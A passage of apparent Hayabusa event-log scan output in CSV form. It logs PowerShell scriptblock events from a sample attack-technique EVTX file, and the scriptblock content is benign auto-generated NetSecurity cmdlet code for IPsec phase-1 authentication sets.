([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' -Alias '*' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' -Alias '*' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcess",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 